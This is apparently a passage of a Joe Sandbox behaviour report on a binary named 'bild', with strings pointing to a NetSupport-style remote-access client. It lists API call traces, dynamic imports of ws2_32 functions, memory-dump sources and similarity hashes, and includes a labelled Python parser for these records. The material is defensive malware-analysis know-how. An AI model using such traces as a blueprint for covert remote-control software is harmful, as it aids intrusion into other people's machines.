• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection$Library$AddressCreateErrorEventFreeLastLoadProc
• String ID: Kernel32.dll$WTSGetActiveConsoleSessionId$
• API String ID: 3780373956-2395619914
• Opcode ID: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
• Instruction ID: 5b2845002196474fabc536bb645ff26533f5159a1a467828fb1dae30e08bae14
• Opcode Fuzzy Hash: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
• Instruction Fuzzy Hash: C47149B4A01215AFDB10CFAAC8C0E9AFBF9FF88314F24819AE91597314D771A941CF64
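Added example, not part of the Joe Sandbox report and not Joe Sandbox's own code: a small Python parser for the function records in this listing, so the per-function API sequences can be queried instead of read by eye. It assumes the record layout visible on this page (an "APIs" heading; bullet lines of the form Api.MODULE(args), ref: address, optionally prefixed "Part of subcall function X:" for calls made by callees; bullet "key: value" metadata) and it infers from the values in this report that the fourth dot-separated field of the .sdmp name is the region address and the fifth its page protection (0x20 for the code region, 0x02 for the header, 0x04 for data); both field meanings are assumptions. The sample input is copied from the WTSGetActiveConsoleSessionId record above and the GetMessageA/Sleep record further down, with the Associated dump lines dropped.

```python
"""Parser for the per-function API records of a Joe Sandbox execution-graph listing.

Added example, not Joe Sandbox code. Assumptions: a record starts at an 'APIs'
heading; bullet lines are 'Api.MODULE(args), ref: addr' (optionally prefixed
'Part of subcall function X:') or 'key: value' metadata; in the .sdmp file
name the 4th dot-field is the region address and the 5th its page protection.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field

API_LINE = re.compile(            # also matches CRT helpers like '_memset.LIBCMT ref: ...'
    r"^\s*•\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
META_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*?)\s*$")
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int                       # call-site address inside the dumped module
    subcall_of: int | None = None  # callee address for 'Part of subcall function' lines

    def string_args(self) -> list[str]:
        """Arguments the sandbox printed as string literals (not 32-bit values or '?')."""
        return [a for a in self.args if a and a != "?" and not HEX32.match(a)]


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)

    def dynamic_imports(self) -> list[tuple[str, str]]:
        """(library, symbol) pairs the function resolves at run time: LoadLibrary* or
        GetModuleHandle* with a literal DLL name, then GetProcAddress with a literal name."""
        out, lib = [], "<unresolved>"
        for c in self.apis:
            if c.subcall_of is not None:          # ignore calls made by callees
                continue
            if c.api.startswith(("LoadLibrary", "GetModuleHandle")) and c.string_args():
                lib = c.string_args()[0]
            elif c.api == "GetProcAddress" and c.string_args():
                out.append((lib, c.string_args()[-1]))
        return out

    def dump_region(self) -> dict:
        """Address and page protection of the dumped region (field positions assumed)."""
        f = self.meta.get("Source File", "").split(",")[0].split(".")
        if len(f) < 5:
            return {}
        prot = int(f[4], 16)
        return {"address": int(f[3], 16), "protect": PAGE_PROTECT.get(prot, hex(prot))}


def parse_records(text: str) -> list[FunctionRecord]:
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":                # every function record opens with this heading
            cur = FunctionRecord()
            records.append(cur)
        elif cur is None:
            continue
        elif (m := API_LINE.match(line)):
            args = m["args"].split(",") if m["args"] is not None else []
            cur.apis.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16),
                                    int(m["subfn"], 16) if m["subfn"] else None))
        elif (m := META_LINE.match(line)):
            cur.meta[m["key"]] = m["value"]
    return records


# Two records copied from this report; the 'Associated' dump lines are omitted.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 11075FE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4012B9B4,00000000,00000001,00000000,00000000), ref: 110760A7
• LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105759C
• GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
• SetLastError.KERNEL32(00000078), ref: 110575F4
• FreeLibrary.KERNEL32(00000000), ref: 110575FF
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: CriticalInitializeSection$Library$AddressCreateErrorEventFreeLastLoadProc
• String ID: Kernel32.dll$WTSGetActiveConsoleSessionId$
• API String ID: 3780373956-2395619914
APIs
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11027053
• TranslateMessage.USER32(?), ref: 11027081
• DispatchMessageA.USER32(?), ref: 1102708B
• Sleep.KERNEL32(000003E8), ref: 11027114
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102717A
Similarity
• API ID: Message$DispatchSleepTranslate
• String ID: Bridge$BridgeThread::Attempting to open bridge...
"""
```

Run over the whole listing, `parse_records` gives one record per function with its call sequence, the literals the sandbox recovered, and each LoadLibrary/GetProcAddress pair; for the record above that is ("Kernel32.dll", "WTSGetActiveConsoleSessionId"). The 00000078 passed to SetLastError is ERROR_CALL_NOT_IMPLEMENTED (120), the usual way a runtime-resolved optional API reports that the symbol is absent on the host.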
APIs
  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
  • Part of subcall function 110B0260: _memset.LIBCMT ref: 110B026C
  • Part of subcall function 110B0260: _memset.LIBCMT ref: 110B029D
  • Part of subcall function 110B0AD0: timeGetTime.WINMM(_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B0AD6
  • Part of subcall function 110B0AD0: timeGetTime.WINMM(111F00F8,111E5C98,?), ref: 110B0BA5
• WaitForSingleObject.KERNEL32(?,000000FA,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B743D
• GetDC.USER32(00000000), ref: 110B7481
• GetDeviceCaps.GDI32(00000000,0000000E), ref: 110B748C
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 110B7497
• ReleaseDC.USER32(00000000,00000000), ref: 110B74A3
  • Part of subcall function 110B3090: SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
  • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
  • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
  • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
  • Part of subcall function 110B3090: WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
  • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CapsDeviceObjectSingleTimeWait_memsettime$EventRelease__wcstoi64
• String ID: TraceScrape$_debug
• API String ID: 2936113293-4091781993
• Opcode ID: 9cdd8e8a5d521a6398e64c309cb34abd0cea1cc8d3252b81e48429c5feacb1e5
• Instruction ID: 6857b597a808110f0f281143ea82df92f461d6df4c4e0b5b1330fe4484300919
• Opcode Fuzzy Hash: 9cdd8e8a5d521a6398e64c309cb34abd0cea1cc8d3252b81e48429c5feacb1e5
• Instruction Fuzzy Hash: E941A679E042469BDB05CFB4C8D4FAFBBB5EB84704F1941ADE905AB285DA70EC04C7A4
APIs
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11027053
• TranslateMessage.USER32(?), ref: 11027081
• DispatchMessageA.USER32(?), ref: 1102708B
• Sleep.KERNEL32(000003E8), ref: 11027114
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102717A
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Message$DispatchSleepTranslate
• String ID: Bridge$BridgeThread::Attempting to open bridge...
• API String ID: 3237117195-3850961587
• Opcode ID: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
• Instruction ID: 926780c6f4d8c8949c1ee256bdfa0d08ed5449f0693c43c0c5ab50156846c558
• Opcode Fuzzy Hash: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
• Instruction Fuzzy Hash: AB41B475D01626DBEB15CBEDCC84EBEBBB9AB54708F900169E92593244E735E500CBA0
APIs
• _malloc.LIBCMT ref: 111370A6
• _free.LIBCMT ref: 111370DD
  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
• _free.LIBCMT ref: 1113716D
  • Part of subcall function 1110F270: InterlockedDecrement.KERNEL32(?), ref: 1110F278
• _free.LIBCMT ref: 1113713E
  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: _free$DecrementErrorFreeHeapInterlockedLast__wcstoi64_malloc
• String ID: *HelpReqServer$Client$
• API String ID: 1390041139-761420396
• Opcode ID: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
• Instruction ID: 8e3468a70864abf3cc9909560d123acfb2a7f2167445c6f0ed38d11247114e31
• Opcode Fuzzy Hash: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
• Instruction Fuzzy Hash: 6B313877B001156BDB00DE58DC81BAEF3A9EF88325F154169ED04AB380D675F904C7D5
                                                                                      APIs
                                                                                      • GetWindowPlacement.USER32(00000000,0000002C,110BFEBC,?,Norm,110BFEBC), ref: 110B90E4
                                                                                      • MoveWindow.USER32(00000000,110BFEBC,110BFEBC,110BFEBC,110BFEBC,00000001,?,Norm,110BFEBC), ref: 110B9156
                                                                                      • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B91B1
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                      • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                      • API String ID: 1092798621-1973987134
                                                                                      • Opcode ID: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                      • Instruction ID: fa08d4082dbdb83dc84805081e5a13701295f49ac71a08f55a689e0031bf859b
                                                                                      • Opcode Fuzzy Hash: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                      • Instruction Fuzzy Hash: 6A411DB5B0020AAFDB08DFA4C895EAEF7B5FF88304F104669E519A7644DB30B945CB90
                                                                                      APIs
                                                                                        • Part of subcall function 1112A9E0: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112AA16
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112AA33
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112AA3D
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,socket), ref: 1112AA4B
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112AA59
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112AA67
                                                                                        • Part of subcall function 1112A9E0: FreeLibrary.KERNEL32(00000000), ref: 1112AADC
                                                                                      • LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112B38A
                                                                                      • GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112B3A2
                                                                                      • _calloc.LIBCMT ref: 1112B3AD
                                                                                      • _free.LIBCMT ref: 1112B44B
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 1112B462
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$Library$FreeLoad$_calloc_free
                                                                                      • String ID: ntohl$ws2_32.dll
                                                                                      • API String ID: 2881363997-4165132517
                                                                                      • Opcode ID: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                      • Instruction ID: 62f3d354d7df00a53f20e52f5f0b7ab5f0e2fb1a0c0f97b8c5a029639f714dd3
                                                                                      • Opcode Fuzzy Hash: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                      • Instruction Fuzzy Hash: 67318D75E00229CBD7509F64CD80A9AF7B8FF48715F6081A6DC99A7200DF30AA858FD4
                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100F3FD
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100F420
                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 1100F4A4
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1100F4B2
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4C5
                                                                                      • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F4DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                      • String ID: bad cast
                                                                                      • API String ID: 2427920155-3145022300
                                                                                      • Opcode ID: 01f71cc12634bd0a30440c36912b7c98b47e4755e7b052bf5bdff0cacdfadc3b
                                                                                      • Instruction ID: 370362221ca7244b6b9d163162d4a533615f3e9481550f6b861c2319f727a088
                                                                                      • Opcode Fuzzy Hash: 01f71cc12634bd0a30440c36912b7c98b47e4755e7b052bf5bdff0cacdfadc3b
                                                                                      • Instruction Fuzzy Hash: 1D31A07AD042169FDB11DF94C890BAEF7B8FB04368F51426DEC61A7280DB71AD04CB92
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitializeStringUninitializeW@16
                                                                                      • String ID: HID$PS/2$USB$Win32_PointingDevice
                                                                                      • API String ID: 1826621714-1320232752
                                                                                      • Opcode ID: 01f4c2053d6d3d5b188b910352b3af376dde63b9f7c605ac8684b23757ecbe52
                                                                                      • Instruction ID: ec2d2041e6adeb1d612fb4c2d78acfda5a53ba2d11cec2f487d5e4dde2f70ea0
                                                                                      • Opcode Fuzzy Hash: 01f4c2053d6d3d5b188b910352b3af376dde63b9f7c605ac8684b23757ecbe52
                                                                                      • Instruction Fuzzy Hash: BE317075A0061A9BDB24DF54CD457EAB3B8EF08315F0040E9E909AB244EB75FA84CF50
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F12C5
                                                                                      • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F12DA
                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                      • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1333
                                                                                      • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1378
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$CreateName$ModulePathShort_strrchr
                                                                                      • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                      • API String ID: 1318148156-3179819359
                                                                                      • Opcode ID: 2f41f20b5722acf40c0130390847ae355a62842386f7592ccd3cf37bf6e28cb4
                                                                                      • Instruction ID: ccc4368b31194543ced42f6667aa0c2d7b9d0de7acad865b100199d2ac62ce57
                                                                                      • Opcode Fuzzy Hash: 2f41f20b5722acf40c0130390847ae355a62842386f7592ccd3cf37bf6e28cb4
                                                                                      • Instruction Fuzzy Hash: E431C171A44725AFD724DF64D891B96F7F5EB08708F008168E2B88B6C0D3B1B984CB94
                                                                                      APIs
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 1115F12E
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
